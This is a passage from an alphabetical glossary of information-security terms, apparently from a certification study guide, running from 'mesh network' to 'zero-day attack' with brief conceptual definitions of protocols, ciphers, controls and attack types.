mesh network A network in which all nodes cooperate to relay data and are all connected to one another. To ensure complete availability, continuous connections are provided by using self-healing algorithms to route around broken or blocked paths.
memory leaks Memory problems that cause memory to be exhausted over a period of time.
mobile device management (MDM) Tools used to secure the use of mobile devices on a corporate network.
motivation The reason behind an action.
MTBF See mean time between failures.
MTD See maximum tolerable downtime.
MTTR See mean time to repair.
multipath The use of multiple physical or virtual network paths to a storage device. This can provide both network fault tolerance and increased performance, depending on the exact configuration.
Multiple Input Multiple Output (MIMO) An 802.11 technology that uses multiple antennas, which allow for up to four spatial streams at a time, resulting in greater speeds.
multi-tenancy cloud model A cloud computing model in which multiple organizations share the resources.
National Institute of Standards and Technology (NIST) Special Publication (SP) A security controls development framework developed by the NIST body of the U.S. Department of Commerce.
need to know A security principle that defines the minimums for each job or business function.
network administrator A person responsible for managing and maintaining an organization’s network.
network-attached storage (NAS) Storage that serves the same function as SAN but that is accessed by clients in a different way. In a NAS, almost any machine that can connect to the LAN (or is interconnected to the LAN through a WAN) can use protocols such as NFS, CIFS, or HTTP to connect to a NAS and share files.
Network File System (NFS) A method for accessing data in UNIX/Linux networks.
next-generation firewalls A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering performance.
network enumerator A network vulnerability tool that scans a network and gathers information about users, groups, shares, and services that are visible.
network intrusion detection system (NIDS) A system that is designed to monitor network traffic and detect and report threats.
network intrusion prevention system (NIPS) A system that can take action to prevent an attack from being realized.
nondisclosure agreement (NDA) An agreement between two parties that defines which information is considered confidential and cannot be shared outside the two parties.
nonrepudiation Proof of the origin of data, which prevents the sender from denying that he sent the message and supports data integrity.
numeric password A password that includes only numbers.
OCSP See Online Certificate Status Protocol.
OFB See output feedback.
one-time pad The most secure encryption scheme that can be used. It works likes a running cipher in that the key value is added to the value of the letters. However, it uses a key that is the same length as the plaintext message.
one-time password A password that is only used once to log in to an access control system. Also called a dynamic password.
one-way function A mathematical function that can be more easily performed in one direction than in the other.
Online Certificate Status Protocol (OCSP) An Internet protocol that obtains the revocation status of an X.509 digital certificate.
open authorization (OAUTH) A standard for authorization that allows users to share private resources on one site to another site without using credentials.
open standards Technologies that are available for use by all vendors.
OpenID (OID) An open standard and decentralized protocol by the nonprofit OpenID Foundation that allows users to be authenticated by certain cooperating sites.
operating-level agreement An internal organizational document that details the relationships that exist between departments to support business activities.
operational activities Activities that are carried out on a daily basis when using a device or technology.
Orange Book A collection of criteria based on the Bell-LaPadula model that is used to grade or rate the security offered by a computer system product.
organizational security policy The highest-level security policy adopted by an organization that outlines security goals.
Orthogonal Frequency Division Multiple Access (OFDMA) A technique that takes FDMA a step further by subdividing the frequencies into subchannels. This is the technique required by 4G devices.
Orthogonal Frequency Division Multiplexing (OFDM) A more advanced modulation technique in which a large number of closely spaced orthogonal subcarrier signals are used to carry data on several parallel data streams. It is used in 802.11a and 802.11g. It makes possible speeds up to 54 Mbps.
overt Not concealed; not secret.
output feedback (OFB) A DES mode that works with 8-bit (or smaller) blocks that uses a combination of stream ciphering and block ciphering. However, it uses the previous keystream with the key to create the next keystream.
out-of-band (OOB) An interface connected to a separate and isolated network that is not accessible from the LAN or the outside world.
OWASP (Open Web Application Security Project) An organization that maintains a list of the top 10 errors found in web applications.
packet filtering firewall The type of firewall that is the least detrimental to throughput as it only inspects the header of the packet for allowed IP addresses or port numbers.
palm or hand scan A scan that combines fingerprint and hand geometry technologies. It records fingerprint information from every finger as well as hand geometry information.
passphrase password A password that requires the use of a long phrase. Because of the password’s length, it is easier to remember but much harder to attack, both of which are definite advantages. Incorporating upper- and lowercase letters, numbers, and special characters in this type of password can significantly increase authentication security.
partial-knowledge test A test in which the testing team is provided with public knowledge regarding the organization’s network.
passive fingerprinting Fingerprinting that involves simply capturing packets from the network and examining them rather than sending packets on the network.
Password Authentication Protocol (PAP) A protocol that provides authentication but with which the credentials are sent in cleartext and can be read with a sniffer.
password cracker A program that attempts to guess passwords.
perfect forward secrecy (PFS) An encryption method that ensures that a session key derived from a set of long-term keys cannot be compromised if one of the long-term keys is compromised in the future. To work properly, PFS requires two conditions: Keys must not be reused, and new keys must not be derived from previously used keys.
performance The manner in which or the efficiency with which a device or technology reacts or fulfills its intended purpose.
permutation See transposition.
personally identifiable information (PII) Any piece of data that can be used alone or with other information to identify a particular person.
PFS See perfect forward secrecy.
pharming An attack similar to phishing but that actually pollutes the contents of a computer’s DNS cache so that requests to a legitimate site are actually routed to an alternate site.
phishing A social engineering attack in which a recipient is convinced to click on a link in an email that appears to go to a trusted site but in fact goes to the hacker’s site. It is used to harvest usernames and passwords or credit card and financial data.
phone cloning A process in which copies of a SIM chip are made, allowing another user to make calls as the original user.
physical control A security control that protects an organization’s facilities and personnel.
physical deployment diagram A diagram that shows the details of physical communication links, such as cable length, grade, and wiring paths; servers, with computer name, IP address (if static), server role, and domain membership; device location, such as printer, hub, switch, modem, router and bridge, and proxy location; communication links and the available bandwidth between sites; and the number of users at each site, including mobile users.
physical security manager A person who ensures that the physical security of all buildings and secure locations is maintained and monitored to prevent intrusions by unauthorized individuals.
physical surveillance Capturing and reporting a person’s actions using cameras, direct observance, or CCTV.
PII See personally identifiable information.
plaintext A message in its original format. Also referred to as cleartext.
Platform as a Service (PaaS) A cloud computing model that involves the vendor providing the hardware platform or data center and the software running on the platform. This includes the operating systems and infrastructure software. The company is still involved in managing the system.
platform configuration register (PCR) hash TPM versatile memory that stores data hashes for the sealing function.
point–in-time (or snapshot) replication Periodic replication that uses the least bandwidth because it replicates only changes.
Point to Point Protocol (PPP) A layer 2 protocol used to transport multiprotocol datagrams over point-to-point links that provides authentication and multilink capability.
Point-to-Point-Tunneling Protocol (PPTP) A Microsoft tunneling protocol based on PPP. It uses built-in Microsoft point-to-point encryption and can use a number of authentication methods, including CHAP, MS-CHAP, and EAP-TLS.
policy A broad rule that provides the foundation for development of standards, baselines, guidelines, and procedures. A policy is an information security governance component that outlines goals but does not give any specific ways to accomplish the stated goals.
Policy Decision Point (PDP) An XACML entity that retrieves all applicable polices in XACML and compares the request with the policies.
Policy Enforcement Point (PEP) An XACML entity that protects a resource that a subject (a user or an application) is attempting to access.
port scanner Software that pings every address and port number combination and keeps track of which ports are open on each device as the pings are answered by open ports with listening services and not answered by closed ports.
presence A function provided by many collaboration solutions that indicates the availability of a user. It signals to other users whether a user is online, busy, in a meeting, and so forth.
precise methods DLP methods that involve content registration and trigger almost no false-positive incidents.
preventive control A security control that prevents an attack from occurring.
principle of least privilege See least privilege.
Private Branch Exchange (PBX) A private analog telephone network used within a company.
private cloud A cloud computing model in which a private organization implements a cloud on its internal enterprise to be used by its employees and partners.
privilege escalation The process of exploiting a bug or weakness in an operating system to allow a user to receive privileges to which he is not entitled.
procedure An information security governance component that includes all the detailed actions that personnel are required to follow.
programmer A person responsible for developing software that an organization uses and who must understand secure software development.
protocol analyzer Software that collects raw packets from a network and is used by both legitimate security professionals and attackers.
prototyping Using a sample of code to explore a specific approach to solving a problem before investing extensive time and cost in the approach.
proxy firewall A firewall that stands between a connection from the outside and the inside and makes the connection on behalf of the endpoints. With a proxy firewall, there is no direct connection.
public cloud The standard cloud computing model in which a service provider makes resources available to the public over the Internet.
public key infrastructure (PKI) A security framework that includes systems, software, and communication protocols that distribute, manage, and control public key cryptography.
private key encryption See symmetric encryption.
public key encryption See asymmetric encryption.
qualitative risk analysis A method of analyzing risk whereby intuition, experience, and best practice techniques are used to determine risk.
quantitative risk analysis A method of analyzing risk whereby estimated values and formulas are used to determine risk.
RA See registration authority.
race condition An attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome.
radio frequency identification (RFID) A technology that uses radio frequency chips and readers to manage inventory. The chips are placed on individual pieces or pallets of inventory. RFID readers are placed throughout the location to communicate with the chips.
RAID See redundant array of independent disks.
rapid application development (RAD) A development model in which less time is spent upfront on design, while emphasis is placed on rapidly producing prototypes with the assumption that crucial knowledge can only be gained through trial and error.
RC4 A stream cipher that uses a variable key size of 40 to 2,048 bits and up to 256 rounds of transformation.
RC5 A block cipher that uses a key size of up to 2,048 bits and up to 255 rounds of transformation. Block sizes supported are 32, 64, and 128 bits.
RC6 A block cipher based on RC5 that uses the same key size, rounds, and block size.
Real Time Protocol (RTP) A protocol used in the delivery of voice and video traffic.
reconnaissance The process of gathering information that may be used in an attack.
record-level encryption Encryption that is performed at the record level. Choices can be made about which records to encrypt, which has a significant positive effect on both performance and security.
recoverability The probability that a failed security solution or device can be restored to its normal operable state within a given timeframe, using the prescribed practices and procedures.
recovery control A security control that recovers a system or device after an attack has occurred.
recovery point objective (RPO) The point in time to which a disrupted resource or function must be returned.
recovery time objective (RTO) The shortest time period after a disaster or disruptive event within which a resource or function must be restored to avoid unacceptable consequences.
redundant array of independent disks (RAID) A hard drive technology in which data is written across multiple disks in such a way that a disk can fail and the data can be quickly made available from the remaining disks in the array without resorting to a backup tape.
registration authority (RA) The entity in a PKI that verifies the requestor’s identity and registers the requestor.
regulatory security policy A security policy that addresses specific industry regulations, including mandatory standards.
remanence Any data left after media has been erased.
remote access Applications that allow users to access an organization’s resources from a remote connection.
Remote Access Dial in User Service (RADIUS) An authentication framework that allows for centralized authentication functions for all network access devices.
remote assistance A feature that often relies on the same technology as desktop sharing that allows a technician to share a user’s desktop for the purpose of either teaching the user something or troubleshooting an issue for the user.
Remote Desktop Protocol (RDP) A proprietary protocol developed by Microsoft that provides a graphical interface to connect to another computer over a network connection.
Representational State Transfer (REST) A pattern for interacting with content on remote systems, typically using HTTP.
request for comment (RFC) A formal document that describes research or innovations on the Internet or its systems created by the Internet Engineering Task Force (IETF).
request for information (RFI) A bidding-process document that collects written information about the capabilities of various suppliers. An RFI may be used prior to an RFP or RFQ, if needed, but can also be used after these if the RFP or RFQ does not obtain enough specification information.
request for proposal (RFP) A bidding-process document that is issued by an organization that gives details of a commodity, a service, or an asset that the organization wants to purchase.
request for quotation (RFQ) A bidding-process document that invites suppliers to bid on specific products or services. RFQ generally means the same thing as Invitation for Bid (IFB). RFQs often include item or service specifications.
residual risk Risk that is left over after safeguards have been implemented.
resource exhaustion A state that occurs when a computer is out of memory or CPU cycles.
retina scan A scan of the retina’s blood vessel pattern.
return on investment (ROI) The money gained or lost after an organization makes an investment.
RFC See request for comment.
RFI See request for information.
RFID See radio frequency identification.
RFP See request for proposal.
RFQ See request for quotation.
Rijndael algorithm An algorithm that uses three block sizes of 128, 192, and 256 bits. A 128-bit key with a 128-bit block size undergoes 10 transformation rounds. A 192-bit key with a 192-bit block size undergoes 12 transformation rounds. Finally, a 256-bit key with a 256-bit block size undergoes 14 transformation rounds.
RIPEMD-160 A message digest algorithm that produces a 160-bit hash value after performing 160 rounds of computations on 512-bit blocks.
risk The probability that a threat agent will exploit a vulnerability and the impact of the probability.
risk acceptance A method of handling risk that involves understanding and accepting the level of risk as well as the cost of damages that can occur.
risk avoidance A method of handling risk that involves terminating the activity that causes a risk or choosing an alternative that is not as risky.
risk assessment A tool used in risk management to identify vulnerabilities and threats, assess the impact of those vulnerabilities and threats, and determine which controls to implement.
risk management The process that occurs when organizations identify, measure, and control organizational risks.
risk mitigation A method of handling risk that involves defining the acceptable risk level the organization can tolerate and reducing the risk to that level.
risk transference A method of handling risk that involves passing the risk on to a third party.
ROI See return on investment.
RPO See recovery point objective.
RTO See recovery time objective.
runtime debugging The process of using a programming tool to not only identify syntactic problems in the code but to also discover weaknesses that can lead to memory leaks and buffer overflows.
SABSA See Sherwood Applied Business Security Architecture.
SAN See storage-area network.
sandboxing Segregating virtual environments for security proposes.
scalability A characteristic of a device or security solution that describes its capability to cope and perform under an increased or expanding workload.
screened host A firewall that is between the final router and the internal network.
screened subnet A subnet in which two firewalls are used, and traffic must be inspected at both firewalls to enter the internal network.
scrubbing The act of deleting incriminating data from an audit log.
SDLC See systems development life cycle.
secret key encryption See symmetric encryption.
secure boot A standard developed by the PC industry to help ensure that a PC boots using only software that is trusted by the PC manufacturer.
Secure Electronic Transaction A protocol that secures credit card transaction information over the Internet.
Secure Real-time Transport Protocol (SRTP) A protocol that provides encryption, integrity, and anti-replay to Real Time Protocol (RTP) traffic.
Secure Shell (SSH) An application and protocol that is used to remotely log in to another computer using a secure tunnel. It is a secure replacement for Telnet.
Secure Sockets Layer (SSL) A protocol developed by Netscape to transmit private documents over the Internet that implements either 40-bit (SSL 2.0) or 128-bit encryption (SSL 3.0).
Security Assertion Markup Language (SAML) An XML-based open standard data format for exchanging authentication and authorization data between parties, particularly between an identity provider and a service provider.
security association (SA) A security relationship established between two endpoints in an IPsec protected connection.
security information and event management (SIEM) Utilities that receive information from log files of critical systems and centralize the collection and analysis of this data.
security parameter index (SPI) A value contained in each IPsec header that helps devices maintain the relationship between each established SA (of which there could be several happening at once) and the security parameters (also called the transform set) used for each SA.
security requirements traceability matrix (SRTM) A spreadsheet-like report that documents the security requirements that a new asset must meet.
security systems development life cycle (SSDLC) A process similar to the SDLC that provides clear and logical stems to follow to ensure that a system includes the appropriate security controls.
sender policy framework (SPF) An email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain’s administrator. If it can’t be validated, it is not delivered to the recipient’s box.
sensor A device used in a SCADA system, which typically has digital or analog I/O, and these signals are not in a form that can be easily communicated over long distances.
separation of duties The concept that sensitive operations should be divided among multiple users so that no one user has the rights and access to carry out a sensitive operation alone. This security measure ensures that one person is not capable of compromising organizational security. It prevents fraud by distributing tasks and their associated rights and privileges between more than one user.
Serial Line Internet Protocol (SLIP) An older layer 2 protocol used to transport multiprotocol datagrams over point-to-point links. It has been made obsolete by PPP.
server-based application virtualization Virtualization in which applications run on servers.
service-level agreements (SLAs) Agreements about the ability of a support system to respond to problems within a certain time frame while providing an agreed level of service.
Service Provisioning Markup Language (SPML) An open standard for exchanging authorization information between cooperating organizations.
service set identifier (SSID) A name or value assigned to identify a WLAN from other WLANs.
Session Initiation Protocol for Instant Messaging and Presence Leveraging Extensions (SIMPLE) A secure protocol that can be used to provide presence information.
Session Initiation Protocol (SIP) server A server that is responsible for creating voice and video sessions in a VoIP network.
SET See Secure Electronic Transaction.
Sherwood Applied Business Security Architecture (SABSA) An enterprise security architecture framework that is similar to the Zachman framework. It uses the six communication questions (what, where, when, why, who, and how) that intersect with six layers (operational, component, physical, logical, conceptual, and contextual). It is a risk-driven architecture, a model for guiding the creation and design of a security architecture. It attempts to enhance the communication process between stakeholders.
S-HTTP A protocol that encrypts only the served page data and submitted data like POST fields, leaving the initiation of the protocol unchanged.
Shibboleth An SSO system that allows the use of common credentials among sites that are a part of the federation. It is based on Security Assertion Markup Language (SAML).
shoulder surfing An attack in which a person watches while a user enters login or other confidential data.
signature-based detection A type of intrusion detection that compares traffic against preconfigured attack patterns known as signatures.
signature dynamics A biometric authentication method that measures stroke speed, pen pressure, and acceleration and deceleration while the user writes his or her signature.
Simple Object Access Protocol (SOAP) A protocol specification for exchanging structured information in the implementation of web services in computer networks.
single loss expectancy The monetary impact of a threat occurrence. The equation is SLE = AV × EF.
single sign-on (SSO) A system in which a user enters login credentials once and can access all resources in the network.
single-tenancy cloud model A cloud computing model where a single tenant uses a resource.
situational awareness Being aware of the environment in which a system operates at a certain point in time.
Six Sigma A process improvement process that includes two project methodologies that were inspired by Deming’s plan/do/check/act cycle.
Skipjack A block-cipher, symmetric algorithm developed by the U.S. NSA that uses an 80-bit key to encrypt 64-bit blocks. It is used in the Clipper chip.
slack space analysis Analysis of the slack (marked as empty or reusable) space on the drive to see whether any old (marked for deletion) data can be retrieved.
SLE See single loss expectancy.
SOA See statement of applicability.
SRTM See security requirements traceability matrix.
SSDLC See security systems development life cycle.
SSH See Secure Shell.
SSL See Secure Sockets Layer.
snapshot A copy of data at a point in time.
SOCKS firewall A circuit-level firewall that requires a SOCKS client on the computers.
Software as a Service (SaaS) A cloud computing model that involves the vendor providing the entire solution, including the operating system, infrastructure software, and application. An SaaS provider might, for example, provide you with an email system and host and manage everything for you.
software patches Updates released by vendors that either fix functional issues with or close security loopholes in operating systems, applications, and versions of firmware that run on network devices.
spam Unrequested email sent out on a mass basis.
spear phishing The process of foisting a phishing attack on a specific person rather than a random set of people.
spiral model A meta-model that incorporates a number of software development models. The spiral model is an iterative approach that places emphasis on risk analysis at each stage.
SPIT (spam over Internet telephony) An attack that causes unsolicited prerecorded phone messages to be sent.
SQL injection attack An attack that inserts, or “injects,” a SQL query as the input data from a client to an application. Results can be reading sensitive data from the database, modifying database data, executing administrative operations on the database, recovering the content of a given file, and in some cases issuing commands to the operating system.
SRTM See security requirements traceability matrix.
stakeholder Individuals, teams, and departments, including groups outside the organization, with interests or concerns that should be considered.
standard An information security governance component that describes how policies will be implemented within an organization.
standard library A group of common objects and functions used by a language that developers can access and reuse without re-creating them.
standard word password A password that consists of a single word that often includes a mixture of upper- and lowercase letters.
stateful firewall A firewall that is aware of the proper functioning of the TCP handshake, keeps track of the state of all connections with respect to this process, and can recognize when packets are trying to enter the network that don’t make sense in the context of the TCP handshake.
stateful protocol analysis detection An intrusion detection method that identifies deviations by comparing observed events with predetermined profiles of generally accepted definitions of benign activity.
statement of applicability (SOA) A document that identifies the controls chosen by an organization and explains how and why the controls are appropriate.
static password A password that is the same for each login.
statistical anomaly-based detection An intrusion detection method that determines the normal network activity and alerts when anomalous (not normal) traffic is detected.
steganography The process of hiding a message inside another object, such as a picture or document.
steganography analysis Analysis of the files on a drive to see whether the files have been altered or to discover the encryption used on the files.
storage area network (SAN) A network of high-capacity storage devices that are connected by a high-speed private network using storage-specific switches.
storage keys TPM versatile memory that contains the keys used to encrypt a computer’s storage, including hard drives, USB flash drives, and so on.
storage root key (SRK) TPM persistent memory that secures the keys stored in the TPM.
storage tiering Placing older data on low-cost, low-performance storage while keeping more active data on a faster storage system.
stream-based cipher A cipher that performs encryption on a bit-by-bit basis and uses keystream generators.
substitution The process of exchanging one byte in a message for another.
switch A device that improves performance over a hub because it eliminates collisions.
symmetric encryption An encryption method whereby a single private key both encrypts and decrypts the data. Also referred to as private, or secret, key encryption.
synchronous encryption Encryption or decryption that occurs immediately.
synchronous replication Nearly near real-time replication that uses more bandwidth than asynchronous replication and cannot tolerate latency.
system-specific security policy A security policy that addresses security for a specific computer, network, technology, or application.
systems development life cycle (SDLC) A process that provides clear and logical steps to follow to ensure that a system that emerges at the end of the development process provides the intended functionality with an acceptable level of security.
supervisory control and data acquisition (SCADA) A system used to remotely control industrial equipment with coded signals. It is a type of industrial control system (ICS).
target test A test in which both the testing team and the organization’s security team are given maximum information about the network and the type of test that will occur.
TCO See total cost of ownership.
TDE See transparent data encryption.
technical control A software or hardware component used to restrict access. See also logical control.
telephony system A system that includes both traditional analog phone systems and digital, or VoIP, systems.
Teredo An IPv4-to-IPv6 transition method that assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6 hosts are located behind IPv4 network address translators.
The Open Group Architecture Framework (TOGAF) An architecture framework that helps organizations design, plan, implement, and govern an enterprise’s information architecture.
third-party connection agreement A document that spells out exactly the security measures that should be taken with respect to the handling of data exchanged between the parties. This is a document that should be executed in any instance where a partnership involves depending upon another entity to secure company data.
threat A condition that occurs when a vulnerability is identified or exploited.
threat actor An entity that discovers and/or exploits vulnerabilities. Not all threat actors will actually exploit an identified vulnerability.
threat agent An entity that carries out a threat.
three-legged firewall A firewall configuration that has three interfaces: one connected to the untrusted network, one to the internal network, and the last to a part of the network called a demilitarized zone (DMZ).
threshold An information security governance component which ensures that security issues do not progress beyond a configured level.
throughput rate The rate at which a biometric system is able to scan characteristics and complete analysis to permit or deny access. The acceptable rate is 6 to 10 subjects per minute. A single user should be able to complete the process in 5 to 10 seconds.
Tiger A hash function that produces 128-, 160-, or 192-bit hash values after performing 24 rounds of computations on 512-bit blocks.
Time Division Multiple Access (TDMA) A modulation technique that increases the speed over FDMA by dividing the channels into time slots and assigning slots to calls. This also helps prevent eavesdropping in calls.
time of check to time of use A class of software bug caused by changes in a system between the checking of a condition (such as a security credential) and the use of the results of that check.
TOS See trusted operating system.
total cost of ownership (TCO) A measure of the overall costs associated with securing an organization, including insurance premiums, finance costs, administrative costs, and any losses incurred. This value should be compared to the overall company revenues and asset base.
transaction log backup A backup that captures all transactions that have occurred since the last backup.
transparent data encryption (TDE) A newer encryption method used in SQL Server 2008 and later that provides protection for the entire database at rest without affecting existing applications by encrypting the entire database.
Transport Layer Security/Secure Sockets Layer (TLS/SSL) A security protocol used to create secure connections to servers.
transposition The process of shuffling or reordering plaintext to hide an original message. Also referred to as permutation.
transposition cipher A cipher that scrambles the letters of the original message into a different order.
Triple DES (3DES) A version of DES that increases security by using three 56-bit keys.
trunk link A link between switches and between routers and switches that carries the traffic of multiple VLANs.
trusted operating system (TOS) An operating system that provides sufficient support for multilevel security and evidence of correctness to meet a particular set of government requirements.
trusted platform module (TPM) A security chip installed on a computer’s motherboard that is responsible for managing symmetric and asymmetric keys, hashes, and digital certificates.
Twofish A version of Blowfish that uses 128-bit data blocks using 128-, 192-, and 256-bit keys and performs 16 rounds of transformation.
Type I hypervisor (or native, bare metal) A hypervisor that runs directly on the host’s hardware to control the hardware and to manage guest operating systems.
Type II hypervisor A hypervisor that runs within a conventional operating system environment.
Unified Extensible Firmware Interface (UEFI) An alternative to using BIOS to interface between the software and the firmware of a system.
unified threat management (UTM) A device that combines a traditional firewall with content inspection and filtering, spam filtering, intrusion detection, and antivirus.
usability Making a security solution or device easier to use and matching the solution or device more closely to organizational needs and requirements.
UTM See unified threat management.
validation testing Testing to ensure that a system meets the requirements defined by the client.
vascular scan A scan of the pattern of veins in a user’s hand or face.
video conferencing Services and software that allow for online meetings with video capability.
virtual desktop infrastructure (VDI) An infrastructure that hosts desktop operating systems within a virtual environment in a centralized server.
virtual firewall A software or hardware firewall that has been specifically created to operate in the virtual environment.
virtual local area network (VLAN) A logical subdivision of a switch that segregates ports from one another as if they were in different LANs.
Virtual Network Computing (VNC) A remote desktop control system that operates much like RDP but uses the Remote Frame Buffer protocol.
virtual private network (VPN) A network whose connections use an untrusted carrier network but provide protection of the information through strong authentication protocols and encryption mechanisms.
virtual storage Storage in which multiple physical locations are pooled from multiple network storage devices and presented to users as a single storage location.
virtual storage area network (VSAN) A logical division of a storage area network, much like a VLAN is a logical subdivision of a local area network.
virtual switch A software application or program that offers switching functionality to devices located in a virtual network.
virtual trusted platform module (VTPM) A software object that performs the functions of a TPM chip.
VM escape An attack in which the attacker “breaks out” of a VM’s normally isolated state and interacts directly with the hypervisor.
VMS See vulnerability management system.
voice over IP (VoIP) A phone system that utilizes the data network and packages voice information in IP packets.
voice pattern or print A scan that measures the sound pattern of a user stating a certain word.
VSAN See virtual storage area network.
V-shaped model A development method that departs from the waterfall method in that verification and validation are performed at each step.
vulnerability An absence or a weakness of a countermeasure that is in place. Vulnerabilities can occur in software, hardware, or personnel.
vulnerability assessment An assessment whose goal is to highlight an issue before someone either purposefully or inadvertently leverages the issue to compromise a component.
vulnerability management system (VMS) Software that centralizes and to a certain extent automates the process of continually monitoring and testing a network for vulnerabilities.
vulnerability scanner Software that can probe for a variety of security weaknesses, including misconfigurations, out-of-date software, missing patches, and open ports.
war chalking A practice that is used to typically accompany war driving. Once the war driver locates a WLAN, he indicates in chalk on the sidewalk the SSID and the types of security used on the network.
war driving The process of riding around with a wireless device connected to a high-power antenna, searching for WLANs.
WASC See Web Application Security Consortium.
waterfall method A development method that breaks the process up into distinct phases. It is somewhat of a rigid approach in which a sequential series of steps are followed without going back to earlier steps.
WAYF See Where Are You From.
web application firewall (WAF) A device that applies rule sets to an HTTP conversation. These sets cover common attack types to which these session types are susceptible.
Web Application Security Consortium (WASC) An organization that provides best practices for web-based applications along with a variety of resources, tools, and information that organizations can make use of in developing web applications.
web conferencing Services and software that allow for chatting, sharing documents, and viewing the screen of a presenter.
Web Services Security (WS-Security) An extension to SOAP that is used to apply security to web services.
whaling A subset of spear phishing that targets a single person who is significant or important.
Where Are You From (WAYF) An SSO system that allows credentials to be used in more than one place. It has been used to allow users of institutions that participate to log in by simply identifying the institution that is their home organization. That organization then plays the role of identity provider to the other institutions.
white box testing Testing in which the team goes into the process with a deep understanding of the application or system.
white hat An entity that breaks into an organization’s system(s) but does not have malicious intent.
Whois A protocol used to query databases that contain information about the owners of Internet resources, such as domain names, IP address blocks, and autonomous system (AS) numbers used to identify private Border Gateway Protocol (BGP) networks on the Internet.
Wi-Fi Alliance A group of wireless manufacturers that promotes interoperability.
Wi-Fi Protected Access (WPA) A wireless security protocol that uses Temporal Key Integrity Protocol (TKIP) for encryption.
Wired Equivalent Privacy (WEP) The first security measure used with 802.11. It can be used to both authenticate a device and encrypt the information between an AP and a device. The problem with WEP is that it implements the RC4 encryption algorithm in a way that allows a hacker to crack the encryption.
wireless controller A centralized appliance or software package that monitors, manages, and controls multiple wireless access points.
work recovery time (WRT) The difference between RTO and MTD, which is the remaining time that is left over after the RTO before reaching the maximum tolerable.
WPA2 A wireless security protocol that is an improvement over WPA. WPA2 uses Counter Cipher Mode with Block Chaining Message Authentication Code Protocol (CCMP), based on Advanced Encryption Standard (AES) rather than TKIP.
WRT See work recovery time.
XACML See Extensible Access Control Markup Language.
XMPP See Extensible Messaging and Presence Protocol.
Zachman framework An enterprise architecture framework that is a two-dimensional classification system based on six communication questions (what, where, when, why, who, and how) that intersect with different views (planner, owner, designer, builder, subcontractor, and actual system).
zero-knowledge test A test in which the testing team is provided with no knowledge regarding the organization’s network.
Zero-day attack An attack on a vulnerable security component of an application or operating system that targets a vulnerability not yet known to the developers of the software.